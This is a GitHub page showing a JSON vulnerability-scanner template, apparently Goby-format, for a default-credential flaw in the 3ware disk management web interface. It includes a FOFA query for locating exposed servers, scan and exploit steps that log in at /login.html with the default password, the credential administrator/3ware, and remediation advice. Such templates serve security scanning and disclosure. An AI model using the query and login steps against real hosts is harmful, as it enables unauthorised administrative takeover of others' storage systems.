-
Notifications
You must be signed in to change notification settings - Fork 33
/
Copy path3ware-default-password-vulnerability.json
162 lines (162 loc) · 5.72 KB
/
3ware-default-password-vulnerability.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
{
"Name": "3ware default password vulnerability",
"Description": "<p>3ware is a disk management system. The system has a default password, and attackers can control the entire platform through the default password administrator/3ware vulnerability, and use administrator privileges to operate core functions.<br></p>",
"Product": "3ware",
"Homepage": "http://www.3ware.tw/",
"DisclosureDate": "2022-03-31",
"Author": "13eczou",
"FofaQuery": "banner=\"Server: 3ware/2.0\" || header=\"Server: 3ware/2.0\"",
"GobyQuery": "banner=\"Server: 3ware/2.0\" || header=\"Server: 3ware/2.0\"",
"Level": "1",
"Impact": "<p>Attackers can control the entire platform through the default password administrator/3ware vulnerability, and use administrator privileges to operate core functions.<br></p>",
"Recommendation": "<p>1. Modify the default password. The password should preferably contain uppercase and lowercase letters, numbers and special characters, and the number of digits is greater than 8.</p><p>2. If it is not necessary, it is forbidden to access the system from the public network.</p><p>3. Set access policies and whitelist access through security devices such as firewalls.</p>",
"References": [
"https://fofa.info/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/login.html",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "whopwd=a&thepwd=3ware"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$head",
"operation": "contains",
"value": "TDMUSER",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "logged",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/login.html",
"follow_redirect": false,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "whopwd=a&thepwd=3ware"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$head",
"operation": "contains",
"value": "TDMUSER",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "logged",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|text|(administrator/3ware)"
]
}
],
"Tags": [
"default Password"
],
"VulType": [
"default Password"
],
"CVEIDs": [
""
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "5.0",
"Translation": {
"CN": {
"Name": "3ware 默认口令漏洞",
"Product": "3ware",
"Description": "<p><span style=\"font-size: medium;\"><span style=\"color: rgb(0, 0, 0);\">3ware </span>是一款磁盘管理系统。该系统存在默认口令,<span style=\"color: rgb(53, 53, 53);\">攻击者可通过默认口令administrator/3ware漏洞控制整个平台,使用管理员权限操作核心的功能。</span></span><br></p>",
"Recommendation": "<p>1、修改默认口令,密码最好包含大小写字母、数字和特殊字符等,且位数大于8位。</p><p>2、如非必要,禁止公网访问该系统。</p><p>3、通过防火墙等安全设备设置访问策略,设置白名单访问。</p>",
"Impact": "<p><span style=\"font-size: medium; color: rgb(53, 53, 53);\">攻击者可通过默认口令administrator/3ware漏洞控制整个平台,使用管理员权限操作核心的功能。</span><br></p>",
"VulType": [
"默认口令"
],
"Tags": [
"默认口令"
]
},
"EN": {
"Name": "3ware default password vulnerability",
"Product": "3ware",
"Description": "<p>3ware is a disk management system. The system has a default password, and attackers can control the entire platform through the default password administrator/3ware vulnerability, and use administrator privileges to operate core functions.<br></p>",
"Recommendation": "<p>1. Modify the default password. The password should preferably contain uppercase and lowercase letters, numbers and special characters, and the number of digits is greater than 8.</p><p>2. If it is not necessary, it is forbidden to access the system from the public network.</p><p>3. Set access policies and whitelist access through security devices such as firewalls.</p>",
"Impact": "<p>Attackers can control the entire platform through the default password administrator/3ware vulnerability, and use administrator privileges to operate core functions.<br></p>",
"VulType": [
"default Password"
],
"Tags": [
"default Password"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}